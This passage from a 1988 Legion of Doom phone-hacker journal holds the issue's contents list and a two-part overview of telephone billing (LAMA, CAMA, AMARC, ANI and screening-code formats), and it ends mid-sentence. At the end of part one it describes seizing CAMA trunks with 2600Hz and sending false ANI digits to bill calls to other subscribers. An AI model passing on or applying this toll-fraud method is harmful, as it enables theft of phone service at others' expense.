3674 lines
164 KiB
Plaintext
3674 lines
164 KiB
Plaintext
|
||
The LOD/H Technical Journal, Issue #3: File 01 of 11
|
||
|
||
Released: October 21, 1988
|
||
|
||
|
||
|
||
THE
|
||
|
||
LOD/H TECHNICAL JOURNAL
|
||
-----------------------
|
||
|
||
|
||
INTROUCTION:
|
||
|
||
|
||
When putting together a high quality newsletter, it is sometimes difficult
|
||
to locate suitable articles and arrange with the author for transmission.
|
||
Difficulties of this type have caused this issue to be almost one year late.
|
||
All of the older articles have been updated to insure the latest, most
|
||
accurate information.
|
||
|
||
2600 Magazine update:
|
||
|
||
Lex Luthors' Hacking IBM VM/CMS Systems article from Issue 2 has been
|
||
published in the November/December issue of 2600 of 1987. Phucked Agent 04's
|
||
article on the Outside Loop Distribution Plant has been published in the
|
||
Fall/88 issue. This brings the total up to 5 articles from the LOD/H
|
||
Technical Journal that they have published. The others were CLASS by The
|
||
Videosmith, the TSPS Console by The Marauder, and Update #4 of the LOH Telenet
|
||
Directory. To subscribe to 2600, which is published quarterly contact:
|
||
|
||
2600
|
||
PO Box 762
|
||
Middle Island, NY USA 11953
|
||
|
||
Or call for more information: (516) 751-2600
|
||
|
||
|
||
You can find the Technical Journal on the following boards:
|
||
|
||
The Phoenix Project: 512-441-3088
|
||
Digital Logic : 305-752-8645 (NEW USER PASS = RISC)
|
||
|
||
------------------------------------------------------------------------------
|
||
|
||
TABLE OF CONTENTS:
|
||
|
||
01 Introduction to the LOD/H Technical Journal Staff 02 K
|
||
and Table Of Contents for Volume 2, Issue 3
|
||
|
||
|
||
02 Understanding Automatic Message Accounting Part A Phantom Phreaker 22 K
|
||
|
||
03 Understanding Auotmatic Message Accounting Part B Phantom Phreaker 25 K
|
||
|
||
04 Update file: Shooting Shark's UNIX password hacker Shooting Shark 03 K
|
||
|
||
05 An Introduction to Teradyne's 4TEL System Doom Prophet 12 K
|
||
|
||
06 A Cellular Automaton Encryption System The Mentor 29 K
|
||
|
||
07 Hacking the IRIS Operating System The Leftist 13 K
|
||
|
||
08 A Guide to Coin Control Systems Phase Jitter 08 K
|
||
|
||
09 A UNIX password hacker from USENET ------------- 16 K
|
||
|
||
10 Reprint News Article: 'LOD BUST MYTH' -------------- 13 K
|
||
|
||
11 Network News & Notes The Mentor 30 K
|
||
|
||
|
||
Total: 6 articles, 11 files 173 K
|
||
|
||
------------------------------------------------------------------------------
|
||
|
||
|
||
The LOD/H Technical Journal, Issue #3: File 02 of 11
|
||
|
||
$LOD$LOD$LOD$LOD$LOD$LOD$LOD$LOD$LOD$LOD$LOD$LOD$LOD$
|
||
L L
|
||
O AUTOMATIC MESSAGE ACCOUNTING O
|
||
D D
|
||
$ (AMA) $
|
||
L L
|
||
O An overview O
|
||
D D
|
||
$ Written by Phantom Phreaker $
|
||
L L
|
||
O Legion Of Doom! O
|
||
D D
|
||
$LOD$LOD$LOD$LOD$LOD$LOD$LOD$LOD$LOD$LOD$LOD$LOD$LOD$
|
||
|
||
<part one of two>
|
||
|
||
|
||
This article is meant to provide an explanation of Automatic Message
|
||
Accounting (AMA) and how it was/is used in the past and present.
|
||
|
||
All information included in this file is correct to my knowledge, however,
|
||
if anyone notices any errors or has anything interesting to add, try to get in
|
||
touch with me one way or another and let me know.
|
||
|
||
Hopefully this article will clear up any misconceptions about AMA that
|
||
have been circulating around on bulletin boards and by word of mouth. Keep in
|
||
mind, however, that the information here may not be applicable to your
|
||
specific area or telco. The information contained herein generally applies to
|
||
the BOC's, and if you are served by an independent telco, your method of
|
||
billing may differ.
|
||
|
||
This article is aimed more towards the more experienced telecommunications
|
||
enthusiast. People with limited knowledge may have a hard time understanding
|
||
the information presented here. However, if you can contact me I will try to
|
||
answer any questions or clarify anything included in this article that isn't
|
||
understood.
|
||
|
||
Information will be included in this article concerning the use of AMA in
|
||
the past. This is being done for people in older areas or areas served by an
|
||
independent telco that may still be using the old technology.
|
||
|
||
|
||
HISTORY
|
||
-------
|
||
|
||
In the past, Call Detail Record (CDR) information was collected and
|
||
recorded by cordboard operators in a process known as manual ticketing. The
|
||
operator recorded this information by writing it down manually upon a
|
||
formatted record called a ticket. These tickets were sent to the appropriate
|
||
office where billing was handled. This manual ticketing process was
|
||
time-consuming, and was phased out with the introduction of electromechanical
|
||
switching.
|
||
|
||
Before the advent of AMA, a magnetically operated counter called a message
|
||
register was associated with each subscribers line in a given central office.
|
||
This counter was responsible for counting the number of calls that each
|
||
subscriber made, for billing purposes. This message register was caused to
|
||
operate one or more times when the called party answered the telephone. The
|
||
way this works is when the called party answers, a reverse battery signal was
|
||
sent back over the trunk circuit to activate a relay in the originating office
|
||
which was responsible for the application of a 48-volt battery to advance the
|
||
message register the appropriate number of units. A local call is/was usually
|
||
one message unit, regardless of how long the call lasted. Local calls to
|
||
further away areas were/are usually two message units. Long distance calls
|
||
were handled either by cordboard operators, using manual ticketing, or by a
|
||
method not involving operators known as zone registration. With zone
|
||
registration, calls to different zones would cause the message register to
|
||
operate two or more times per time period. This would make the cost higher for
|
||
longer calls, and less for shorter calls.
|
||
|
||
At the end of the billing period, each message register had to be manually
|
||
photographed to keep track of the number of calls made by that specific
|
||
subscriber. These photos were taken by a 35 millimeter camera that was known
|
||
as a Traffic Usage Recorder, and then sent to the same place that manual
|
||
tickets (prepared by operators) were. However, this method of billing soon
|
||
grew costly and inefficient, so a new method, LAMA (Local Automatic Message
|
||
Accounting) was developed. Additional and more specific information shall be
|
||
included later in the article.
|
||
|
||
In the late 1940's, the Bell System developed LAMA, which recorded the
|
||
billing information in a much more efficient manner. However, some end offices
|
||
did not have enough call traffic to warrant the installation of LAMA
|
||
equipment. To solve this problem, CAMA (Centralized Automatic Message
|
||
Accounting) was developed in the mid 1950's. CAMA was different from LAMA in
|
||
that it was based in a toll or tandem office and could record the AMA
|
||
information for every end office that it served. More on LAMA and CAMA will be
|
||
included later in the article.
|
||
|
||
Another development concerning AMA is the computerization of the system,
|
||
named LAMA-C or CAMA-C, for 'LAMA-Computerized' or 'CAMA-Computerized'. CAMA
|
||
had used paper tape perforators for a time before the magnetic tape method was
|
||
introduced with CAMA-C. LAMA-C is a computerized version of LAMA which also
|
||
uses magnetic tape (LAMA-C is still used today). LAMA and LAMA-A (previous
|
||
versions) used paper tape, although LAMA-A was more efficient.
|
||
|
||
LAMA, LAMA-A, CAMA, and CAMA-C were all part of the AMARS, the Automatic
|
||
Message Accounting Recording System. However, a newer term for more modern
|
||
setups is the AMACS, for Automatic Message Accounting Collection System. The
|
||
AMACS includes end office AMA systems, a recent introduction called the AMARC
|
||
(AMA Recording Center), AMARC sensors from end offices to the AMARC, the data
|
||
links used to transmit billing information, and data recievers located at the
|
||
AMARC site. The AMARC is a product of the new age of computerized technology
|
||
as it applies to the telecommunications systems used in our society. Still,
|
||
LAMA and CAMA and their different versions shall be described and explained to
|
||
help people understand how they were/are used.
|
||
|
||
|
||
LAMA
|
||
----
|
||
|
||
LAMA is described by Notes on the Network (1983) as 'A process using
|
||
equipment located in a local office for automatically recording billing data
|
||
for message rate calls and for customer-dialed station to station toll
|
||
calls'. What this is means is that if your CO uses LAMA, and you are on a
|
||
single party line (most people are), all 1+ toll calls will be billable by
|
||
LAMA equipment, and all calls coming from message rate lines. A message rate
|
||
line, for those of you not familiar with the term, is a telephone line that
|
||
has the ability to receive incoming calls, but all outgoing calls will cost
|
||
the subscriber. The subscriber pays for basic service (the ability to receive
|
||
calls) with the consideration that all other calls (even local ones) will cost
|
||
a certain amount of money per call. Many subscribers in several major cities
|
||
get this feature automatically, and thus phone bills are generally higher in
|
||
these areas.
|
||
|
||
LAMA originally recorded billing information on punched paper tape, in a
|
||
version known as LAMA-A, but now magnetic tape is generally the format used in
|
||
places where LAMA-C equipment is used. The paper tape perforators that
|
||
recorded the CDR data in LAMA-A were noisy, and they needed maintenance due to
|
||
their electromechanical construction. The magnetic tape method is much more
|
||
reliable, and quieter as well.
|
||
|
||
If a persons End Office uses LAMA, then all toll calls from all lines and
|
||
all local calls from metered rate lines are recorded on the LAMA tape, with a
|
||
few exceptions. LAMA can only be used to record AMA information for one and
|
||
two party lines. On other party lines such as three and four party, the
|
||
originating caller has his/her number identified by an operator via the ONI
|
||
(Operator Number Identification) method. It is not been determined by the
|
||
author if the BOC (Bell Operating Company) operators such as TOPS (Traffic
|
||
Operator Position System, made by Northen Telecom Inc. of Canada) or MPOW
|
||
(Multi-Purpose Operator Workstation, by US West) operators would be used for
|
||
this ONI or not. I would guess that AT&T TSPS operators would handle an
|
||
inter-LATA toll call, and that the BOC TOPS/MPOW operators would handle the
|
||
ONI for an intra-LATA call (my reasoning behind this statement is the fact
|
||
that whenever I have had an ONI due to equipment failure, which is similar to
|
||
ONI needed, only the ANI outpulsing was garbled, the called number was still
|
||
transmitted in the correct fashion. I am assuming that the end office
|
||
switching system would route the call to the correct operator position by
|
||
matching the NPA-NXX with some sort of internal table which makes a
|
||
distinction between intra and inter-LATA calls). Anyway, these calls had their
|
||
AMA information sent from the appropriate operator position to the toll office
|
||
that served the 3+ party line, onto CAMA tape. Another instance in which a
|
||
LAMA office may use CAMA instead is when an ANIF (ANI Failure) occurs. If the
|
||
ANIF is sent to TSPS, then that TSPS will record billing information upon CAMA
|
||
tape by using ONI. It seems that AMA information that has been recorded by an
|
||
operator is buffered and stored until it is time to send the information to
|
||
the appropriate places for processing. In the case of AT&T TSPS operators, the
|
||
TSPS had it's own magnetic tape which was sent to the RAO (Regional Accounting
|
||
Office, formerly called Revenue Accounting Office) on a regular basis. I am
|
||
not sure if this method is still used or if TSPS AMA has been updated or
|
||
enhanced in some way.
|
||
|
||
|
||
EXAMPLES OF LAMA USAGE
|
||
----------------------
|
||
|
||
The following is the call flow procedure in a LAMA-A (paper tape) system.
|
||
|
||
After a customer completes dialing, the dialed number (the called number),
|
||
the originating class of service, Line Equipment Number (LEN), and call type
|
||
are sent from the switch to the AMA equipment. Translations, such as figuring
|
||
the billing telephone number from the Line Equipment Number, are done. The
|
||
information that comes from the translations procedures determines which paper
|
||
tape perforator shall be used to record the data for this specific call. A
|
||
record of the initial information gathered is called the initial entry. The
|
||
last line of the initial entry contains a two digit code called a Call
|
||
Identity Index, which identifies telco equipment such as the trunk or district
|
||
junctor that will be used for that call.
|
||
|
||
When the call is answered, another entry is made, called the answer
|
||
entry. This entry is a single line on the paper tape and has the CII and the
|
||
exact time that the call was answered on it.
|
||
|
||
The last entry on the paper tape is known as the disconnect entry. This
|
||
entry contains the CII and the exact time that the call ended.
|
||
|
||
The CII is important because it is what the RAO used to group together all
|
||
the data about a given call. Entries are recorded at different times in a LAMA
|
||
system, they are not in sequential order, so the CII makes it easier to find
|
||
all three entries for a specific call.
|
||
|
||
This method of recording AMA information required the RAO to 'unshuffle
|
||
the deck' when it came time to organize the AMA information. The variations in
|
||
the AMA recording formats used by different switching systems eventually led
|
||
Bellcore to develop a standard AMA format, named the Bellcore AMA Format
|
||
(BAF). More information will be included about this format later in the
|
||
article.
|
||
|
||
In a No. 5 Crossbar switching system, the AMA setup used special purpose 3
|
||
inch wide paper tape on which AMA records were recorded by CO equipment. This
|
||
method of recording is for the stone ages, as it has been phased out by almost
|
||
every BOC. Similar to the LAMA-A call flow, this method of AMA used three AMA
|
||
entries. The first one was the customers service information, which included
|
||
the calling and called telephone numbers, the second one was recorded when the
|
||
telephone was answered, and the third one was recorded at disconnect. This
|
||
also made the job at the RAO a bit harder, as again, they had to 'unshuffle
|
||
the deck'.
|
||
|
||
The No. 2 ESS introduced the latest magnetic tape recording technology
|
||
that was available at that time. The 2E used 200 BPI, 7 track mag tapes, and
|
||
it introduced special data coding conventions. It's technology and
|
||
conventions are still in use today, but I think that the BPI and number of
|
||
tracks have been increased. The 2E mimics the No. 5 Crossbar AMA method by
|
||
recording three entries and interleaving them on the magnetic tape. Data
|
||
common to all calls on a tape (such as date, CO info, etc.) are recorded in
|
||
special tape headers. The No. 2B ESS was introduced with the same AMA
|
||
technology as the 2E, but a 2B that provides equal access capabilities for
|
||
interexchange carriers adds a new data entry to the three used by the 2E. This
|
||
new entry reports the time of connection of a carrier to the local network,
|
||
which is needed for carrier access billing.
|
||
|
||
The No. 1 ESS modernized the AMA process even more. The 1E used 200 BPI,
|
||
nine track tape. The 1E provides data collection memory registers for AMA
|
||
information on applicable calls. A register is assigned to an AMA call and
|
||
kept open for the call's duration. This register collected most of the billing
|
||
data that was needed. The AMA information was then written to magtape at the
|
||
time of disconnect. This made it easier for the RAO to process. The AMA
|
||
format used by the 1E uses variable length records whose fields occur for the
|
||
most part in a general, preset pattern. Eventually, though, even the 1E AMA
|
||
method was found to be slightly faulty. This was due to high processing costs
|
||
at the RAO and the problem of tape headers getting erased from the tape. The
|
||
BAF was made to solve the problems that are associated with other AMA setups.
|
||
An update to the BAF is called the EBAF, or Extended Bellcore AMA Format. The
|
||
main difference between the BAF and EBAF is that EBAF is more flexible and can
|
||
be used easier, as the BAF uses a defined structure for storing data. The EBAF
|
||
can append other information to the end of an AMA record, and this makes it
|
||
more flexible.
|
||
|
||
|
||
ANI FORMATS
|
||
-----------
|
||
|
||
The ANI formats outpulsed in a LAMA arrangement are as follows (assume
|
||
that the call being shown for an example is being dialed from a home
|
||
telephone, as dialing from coinphones would cause different ST signals to be
|
||
sent; also the type of signaling in this case is SF in-band):
|
||
|
||
|
||
CALLED number:KP+(NPA)+NXX+XXXX+ST
|
||
|
||
CALLING number:KP+I+NXX+XXXX+ST
|
||
|
||
|
||
The second format is the ANI associated with LAMA and is sent to the LAMA
|
||
equipment after the ANI receiving trunk winks. The NPA included in this
|
||
example is optional and only needed if the subscriber is making a call to a
|
||
Foreign NPA (FNPA). The complete called number is not included in all cases,
|
||
as when an AMA setup is configured for bulk-billing. In bulk-billing, the
|
||
entire called number is not recorded, but just enough for billing purposes.
|
||
The CALLING number is the number that the subscriber is dialing from. These
|
||
two numbers are sent in Multi Frequency (MF) tones to MF receivers located
|
||
within a CO. The I in the ANI is an information digit, and these shall be
|
||
explained later in the article.
|
||
|
||
One may wonder how a CO knows which lines it serves are message rate lines
|
||
and which are flat rate. On electromechanical switches such as Step by Step,
|
||
No. 1 and No. 5 Crossbar (it should be noted that there are no remaining panel
|
||
switches within the Bell System), there is an electronic line card associated
|
||
with each Directory Number which holds information relevant to that line.
|
||
These cards have to have any type of change hardwired into them. However, in
|
||
digital/ electronic switching systems, there are Line Class Codes which
|
||
reflect information about each subscribers line. There are many, many of these
|
||
codes. Some of the more common and interesting ones are listed below:
|
||
|
||
|
||
LCC EXPLANATION
|
||
--- -----------
|
||
|
||
1FR Single party Flat rate Residential
|
||
line
|
||
|
||
1MR Single party Metered rate residential
|
||
line
|
||
|
||
1CF Single party Coin First coin
|
||
telephone
|
||
|
||
1OF Single party Official (telco) line
|
||
|
||
1FB Single party Flat rate Business line
|
||
|
||
1MB Single party Metered rate Business
|
||
line
|
||
|
||
|
||
These codes can be found for a line in several places, such as certain
|
||
fields in telco computer output reports. COSMOS and LMOS are two such
|
||
computers that hold this information. If you find COSMOS printouts or have
|
||
access to COSMOS, these Line Class Codes will be listed under the 'LCC' field
|
||
in an ISH, INQ, or other inquiry. Sometimes the data in the LCC field will
|
||
match or be similar to the data in the US field, which is a USOC (Universal
|
||
Service Order Code). A USOC and an LCC aren't the same thing though.
|
||
|
||
|
||
CAMA
|
||
----
|
||
|
||
CAMA operates along the same basic principle that LAMA does, except that
|
||
CAMA is based in a toll or tandem office (class 4). CAMA is made to be used in
|
||
areas where it would be costly to implement a LAMA arrangement for each and
|
||
every class 5 office. This is because some end offices did not have enough
|
||
traffic to warrant the cost and work required to install LAMA equipment. LAMA
|
||
setups can/could be found in abundance in rural areas near large cities.
|
||
|
||
The first letter in each of the acronyms (L)AMA and (C)AMA describes the
|
||
usage of each. (L)AMA, for Localized, in a local central office, and (C)AMA
|
||
for Centralized, in a toll office.
|
||
|
||
The outpulsing formats to CAMA are similar to the LAMA ANI outpulsing. The
|
||
outgoing trunk to the serving CAMA office from the end office sends the called
|
||
DN in the format of KP+(NPA)+NXX+XXXX+ST. Next, the incoming CAMA trunk
|
||
requests the end office to send the calling number. This is sent as
|
||
KP+I+(NPA)+NXX+XXXX+ST, where the I is an information digit which gives
|
||
information about the status of the process, and the NPA may or may not be
|
||
needed, depending upon the setup. The information digits that follow are used
|
||
in ANI outpulsing to Local and Centralized AMA. They are:
|
||
|
||
|
||
0-Automatic Identification (a normal call, with no special
|
||
treatment);
|
||
|
||
1-Operator Identification (ONI-call is sent to an operator who
|
||
requests the customer to give the number they are calling from);
|
||
|
||
2-Identification Failure (ANI Failure, handled the same way as
|
||
ONI).
|
||
|
||
|
||
The ONI due to ANIF and normal ONI which is used on certain party lines
|
||
are kept track of. If too many ANI Failures happen, then a report will be
|
||
generated indicating this fact. ONI needed is more standard and ordinary, and
|
||
thus safer for the telecommunications enthusiast. This information can be put
|
||
to a good use, as if you find an outgoing CAMA trunk when you are boxing, you
|
||
can place calls over it by using the above CAMA formats. The only limiting
|
||
factor is that the NXX of the calling number that you sent for ANI must be an
|
||
office that is served by the particular CAMA offices trunk that you are using.
|
||
|
||
Note that CAMA is not used much anymore, it was mainly used with Electro-
|
||
Mechanical toll switches such as the No. 4A Crossbar, and the Crossbar Tandem
|
||
(XBT). I don't think there are any XBTs or 4As in operation in the AT&T toll
|
||
network, but CAMA may be used by independent telcos, or by telcos in rural
|
||
areas that serve only a small number of central offices. In an independent
|
||
telco setup, a CAMA arrangement may be used, but not in the same way as AT&T
|
||
has used it. The centralized location may not be a toll office, it may just be
|
||
the largest CO in that companies network. There can be several variations.
|
||
CAMA was originally introduced to work with and in conjunction with ANI, thus
|
||
the original term for the process, CAMA/ANI. For a complete description of ANI
|
||
in electromechanical switching systems, see one of the older issues of Phrack
|
||
Inc. newsletter for a file written by Doom Prophet and myself, titled
|
||
'Automatic Number Identification'. I have seen CAMA mentioned in recent telco
|
||
information, so I assume that CAMA is still in use, at least in some places.
|
||
Supposedly a way to determine if you are on CAMA is to dial local numbers, and
|
||
send 2600Hz. If you can seize a trunk, then it is likely that you are served
|
||
by CAMA. You can then pick local exchange codes, (NXX), dial them, seize a
|
||
trunk, and then MF using the CAMA format included above, sending a false ANI
|
||
for one of the local exchanges. If you do this, I suggest that you don't send
|
||
the ANI of a resident. Use non-working numbers, disconnected numbers, payphone
|
||
numbers. I am not sure if there is any check done upon the number sent in ANI
|
||
by the toll office or not, but it is probable that the local switch is
|
||
responsible for screening out invalid numbers and such. So if you can get on a
|
||
CAMA trunk then you have the power to bill calls to anyone else who is served
|
||
by a CO that homes in on the same toll office and uses the same CAMA
|
||
equipment.
|
||
|
||
<end of part one>
|
||
The LOD/H Technical Journal, Issue #3: File 03 of 11
|
||
|
||
|
||
$LOD$LOD$LOD$LOD$LOD$LOD$LOD$LOD$LOD$LOD$LOD$LOD$LOD$
|
||
L L
|
||
O AUTOMATIC MESSAGE ACCOUNTING O
|
||
D D
|
||
$ (AMA) $
|
||
L L
|
||
O An overview O
|
||
D D
|
||
$ Written by Phantom Phreaker $
|
||
L L
|
||
O Legion Of Doom! O
|
||
D D
|
||
$LOD$LOD$LOD$LOD$LOD$LOD$LOD$LOD$LOD$LOD$LOD$LOD$LOD$
|
||
|
||
<part two of two>
|
||
|
||
|
||
The standard AT&T Toll office switch, the No. 4 ESS, is also equipped to
|
||
handle CAMA if necessary. The CAMA procedure is as follows: Call data for the
|
||
CAMA call is kept in a buffer (technically called an Accounting Block (AB))
|
||
which then stores the entry upon a nine track 800-bpi (bits per inch) AMA tape
|
||
(note: the information used in research for this part of the article was
|
||
rather old, so the bits per inch has probably increased). The data that are
|
||
kept in this buffer and put on the tape are as follows: the calling DN, the
|
||
called DN, answer and disconnect times accurate to 0.1 second, and other misc.
|
||
information. The callers DN can be entered into the 4ESS in two ways, ANI or
|
||
ONI. ANI is of course the normal method for identifying a callers DN for
|
||
billing purposes. ONI is used when there is an ANIF, or when it is needed (the
|
||
other equipment cannot get the DN with ANI). When the 4E gets an ANIF or an
|
||
ONI needed, it sends the call to a TSPS operator, who should ask the caller
|
||
for their number. When an operator gets an ONI situation 'from' a 4E, she uses
|
||
two types of trunks, a talking trunk, and a keying trunk. The talking trunk is
|
||
what the subscriber comes in upon and is the line over which the operator asks
|
||
for the callers DN. The keying trunk originates at the 4E and terminatates at
|
||
TSPS, and is what is used to send the callers DN (in MF) to the 4ESS office.
|
||
The operator has access to both trunks at the same time, thus she can enter
|
||
the number in a quick and orderly fashion.
|
||
|
||
When a line classification does not fit into the 'one information digit'
|
||
(KP+I+NNX+XXXX+ST) category, two information digits are used. When two are
|
||
used, they are called screening codes. Screening codes are outpulsed along
|
||
with the ANI for certain types of telephone lines, and when ANI is being sent
|
||
to an alternate carrier via 'Equal Access' (Feature Group D, 1+ dialing).
|
||
These screening codes are two digits and precede the subscribers DN. An
|
||
example of screening code outpulsing is as follows:
|
||
|
||
KP+II+NNX+XXXX+ST
|
||
|
||
The II represents two information digits that precede the callers number.
|
||
Some of the more common screening codes are as follows:
|
||
|
||
KP+00+NXX+XXXX+ST Normal telephone call, identified POTS line;
|
||
KP+01+NXX+XXXX+ST ONI needed on a multiparty line;
|
||
KP+02+NXX+XXXX+ST ONI needed due to ANI Failure;
|
||
KP+07+NXX+XXXX+ST Hospital, inmate type telephone;
|
||
KP+08+NXX+XXXX+ST Line restricted from dialing inter-LATA;
|
||
KP+10+NNX+XXXX+ST Telco test call;
|
||
KP+20+NNX+XXXX+ST Automatic Identified Outward Dialing centrex call;
|
||
KP+27+NNX+XXXX+ST Coin telephone call.
|
||
|
||
|
||
These double digit outpulsing formats are used in Equal Access areas, and
|
||
a similar method of outpulsing is used when customers deal with TSPS
|
||
operators.
|
||
For more information, see the July, 1987 issue of 2600 Magazine, an article
|
||
entitled 'How phreaks are caught'.
|
||
|
||
AMARC
|
||
-----
|
||
|
||
The AMARC, or Automatic Message Accounting Recording Center, is a fairly
|
||
modern development toward recording billing information. It offers the telco
|
||
several advantages to the older electromechanical setups, such as increased
|
||
revenue (always a plus in their eyes), reduced RAO processing costs, a new
|
||
computerized format that stores data on 1600 bpi, industry compatible magnetic
|
||
tape, elimination of loss due to paper tapes being destroyed, and elimination
|
||
of per-office paper tape pickup and delivery.
|
||
|
||
|
||
THE NO. 1 AMARC
|
||
---------------
|
||
|
||
The first version of the AMARC was the No. 1 AMARC, which received billing
|
||
data on a real-time basis over dedicated data links. It was based on two DEC
|
||
PDP-11/40 minicomputers. The No. 1 AMARC controls and recieves data from a
|
||
maximum of thirty dedicated channels. A channel consisted of a dedicated line
|
||
(probably a Private Line service) equipped with a 202T data set, operating
|
||
asynchronously at 1.2 kbps. The No. 1 AMARC had a feature which allowed it to
|
||
call, over the DDD network, a backup channel in case one of the normal
|
||
channels experienced a failure. This backup channel could be reached by anyone
|
||
who had the phone number. It has not been determined by the author if there
|
||
was/is any security on these backup channels.
|
||
|
||
|
||
THE NO. 1A AMARC
|
||
----------------
|
||
|
||
Eventually, it was decided that more data channels were needed, and that
|
||
the AMARC computer could be centralized, and not clustered in administrative
|
||
centers, as was the procedure. The No. 1A AMARC fulfilled the telco's needs.
|
||
The No. 1A AMARC uses a higher capacity minicomputer, the DEC PDP-11/70, and
|
||
Western Electric peripheral equipment to provide ninety input channels,
|
||
improved maintenance capabilities, and room for growth in several areas. The
|
||
first No. 1A AMARC began operation in 1981 in the Chicago area.
|
||
|
||
An important feature common to both the No. 1 and No. 1A AMARC was the
|
||
ability to recieve billing information electronically over dedicated lines
|
||
from central office switches. Equipment located in central offices called
|
||
sensors send this data. There are different types of sensors for different
|
||
types of switching equipment, but the most common AMARC sensors shall be
|
||
listed here.
|
||
|
||
|
||
The Call Data Transmitter (CDT). The newest AMARC sensor. The CDT is a
|
||
microprocessor based system which is used to collect data from No. 5 crossbar
|
||
offices. It is designed to be used in systems that do not have LAMA-A and do
|
||
not have enough traffic to warrant the expense of installing the No. 5 ETS.
|
||
It can be used with other sensors, and is not the only kind used in No. 5
|
||
crossbars. The first one was cut over in Illinois in 1980.
|
||
|
||
The Call Data Accumulator (CDA). Similar to the CDT, but uses wired logic
|
||
control. The CDA, which collects AMA information from SxS switches, was the
|
||
first sensor to be made for use with the AMARC. This sensor is connected to
|
||
the ring, tip, and sleeve leads in a SxS switch, probably at the MDF. The
|
||
first CDA was cut over into service in New York in 1975.
|
||
|
||
The Billing Data Transmitter (BDT). Used in electromechanical offices,
|
||
such as the Nos. 1, 5, 4, and 4A Crossbar, SxS CAMA, and the Crossbar Tandem
|
||
(XBT). The BDT replaced up to 10 paper tape perforators that were previously
|
||
used. Provides a newer alternative to LAMA-A. The BDT recieves billing data
|
||
from the older LAMA-A paper tape recorder circuits and sends them to the
|
||
AMARC. The first BDT was cut over in New York in 1976.
|
||
|
||
The No. 5 Electronic Translator System (ETS). The No. 5 ETS was added to
|
||
No. 5 Crossbar systems to provide some electronic switching functions that
|
||
were not present before. These functions are things such as line, trunk, and
|
||
routing translations provided by software methods rather than wired cross
|
||
connections. The No. 5 ETS consists of duplicated Western Electric 3A
|
||
auxillary processors with associated scanners and distributors. The first No.
|
||
5 ETS was installed in Ohio in 1977.
|
||
|
||
VIDAR, a special sensor used in Crossbar No. 1 offices. VIDAR does not
|
||
interface with the AMARC but instead sends data to it's own tape. This tape is
|
||
then sent to the RAO on a regular basis.
|
||
|
||
These various sensors are specially designed electronic units which are
|
||
part of or connected to class 5 offices. These sensors collect and generate
|
||
billing data from the office they are used with. The billing data consist of
|
||
answer and disconect times, call type, and the amount of measured local and
|
||
toll calls made.
|
||
|
||
Some offices have added sensors, but exceptions include several ESS
|
||
systems which use SPC (Stored Program Control) to send data to the AMARC. SPC
|
||
means that the sensor is built into the switch software and that no other
|
||
equipment is needed. An example of this is the NTI DMS-100 switch. Nos. 2, 2B,
|
||
3, 3B, and No. 5 ESS also do not have special AMARC sensors, but send data to
|
||
the AMARC over a synchronous connection via a SPUC/DL (Serial Peripheral Unit
|
||
Controller /Data Link) at speeds of 2.4 and 4.8 kbps. There is another part in
|
||
the 2B ESS AMARC data link, called the AMARC Protocol Converter (APC). The APC
|
||
is a medium between the SPUC/DL and the AMARC.
|
||
|
||
The No. 4 ESS, TSPS, 1ESS, 1AESS, and 2ESS switches don't have AMARC
|
||
sensors, and aren't even connected to the AMARC. These switches all have their
|
||
own AMA systems, from which the data is sent to the RAO regularly. Another
|
||
exception is the DMS-10 Remote Switch, which is connected to a device at the
|
||
RAO called a collector.
|
||
|
||
There are other options possible when dealing with AMA collection, such as
|
||
the Distributed Call Measurement System (DCMS) made by a telco equipment
|
||
vendor, which acts like a mini-AMARC, and Northern Telecom's Distributed
|
||
Processing Peripheral system, which is used to collect billing data from NTI's
|
||
DMS switches. These systems can be used where applicable.
|
||
|
||
|
||
RECENT DEVELOPMENTS
|
||
-------------------
|
||
|
||
In places where magnetic tape has been phased out, a new method of storing
|
||
the AMA data called AMA TeleProcessing Systems (AMATPS) has been implemented.
|
||
AMATPS overcomes the disadvantages of magnetic tape (such as the sequential
|
||
way the data is recorded, the high-density data losses that may happen, and
|
||
the sometimes unseen problems with the tape unit) by using random access disk
|
||
drives. AMATPS also adds some new system parts which can make the job easier.
|
||
Still, some AMATPS are not used to their full capability and can still present
|
||
problems to the telco.
|
||
|
||
One of the parts that AMATPS adds to the overall AMACS is the use of AMA
|
||
Transmitters (AMAT's). These transmitters are added to the sensors, and
|
||
increase the power of the overall setup by providing things such as temporary
|
||
storage areas and programming applications. AMAT's are generally PC-sized
|
||
machines with two disk drives, and 50-150 megabyte hard disks.
|
||
|
||
The second important addition is the collector. The collector acts like
|
||
the AMARC by polling the AMAT over data links. The collector, like AMARC, is a
|
||
centrally located computer system, usuallly running on an IBM Series 1, an
|
||
HP-1000, or an AT&T 3B5.
|
||
|
||
Teleprocessing systems are made to understand a common AMA language format
|
||
made by Bellcore, the Bellcore AMA Format and Extended Bellcore AMA Format.
|
||
These were mentioned in part A of this article.
|
||
|
||
|
||
BOC/AT&T INTERACTION
|
||
--------------------
|
||
|
||
Since the majority of people are served by AT&T, one may wonder how inter-
|
||
LATA call data gets to the given Inter-LATA Carrier (IC), in this case, AT&T.
|
||
AT&T has its own AMA collection system, which is called BILDATS (BILling DATa
|
||
System), and this is what collects the AT&T data. I would guess that each AT&T
|
||
toll office has some sort of interface with this computer system, but I have
|
||
no solid proof of this. It has also been suggested to me from a reliable
|
||
source that AT&T sends each BOC their own magnetic tapes, which the BOC's then
|
||
fill with AT&T's billing information. I am not sure which of these methods is
|
||
used.
|
||
|
||
The BOC billing information takes a different route, however. On a regular
|
||
basis (I believe each day), AMARC tapes are sent to the Regional Accounting
|
||
Office (RAO) or billing office, where each customers intra-LATA traffic is
|
||
calculated and their telephone bill printed and mailed. The customer then
|
||
recieves the bill and goes about whatever method of payment he chooses.
|
||
Telephone bills can usually be paid in person in many different places in
|
||
large cities, or they can be mailed in directly if the customer wishes. In my
|
||
area, the customer pays once, which is a total of his AT&T and BOC bill. This
|
||
is payable to the BOC, and AT&T then gets their payment from the BOC. In the
|
||
case of independent carriers such as US Sprint, MCI, ALC Communications, and
|
||
the like, I cannot say for sure what they all do as there seems to be no
|
||
standard procedure for this interaction, but in two instances, two specific
|
||
RBOC's (US West and BellSouth) handle FG-D Equal Access style billing for MCI
|
||
throughout their serving areas. There is a computer system involved in this
|
||
alternate carrier billing cycle, called the Carrier Access Billing System
|
||
(CABS). This system calculates the prices bases on tariffs in use, and bills
|
||
the carriers on a monthly basis accordingly. I am not sure how widespread the
|
||
use of this sytem is, though. When the customer receives his MCI bill along
|
||
with his BOC bill he can pay them both at once. I would imagine that the
|
||
larger long distance services would be able to afford getting this service
|
||
from the RBOC's, while the smaller ones with less money would do it by
|
||
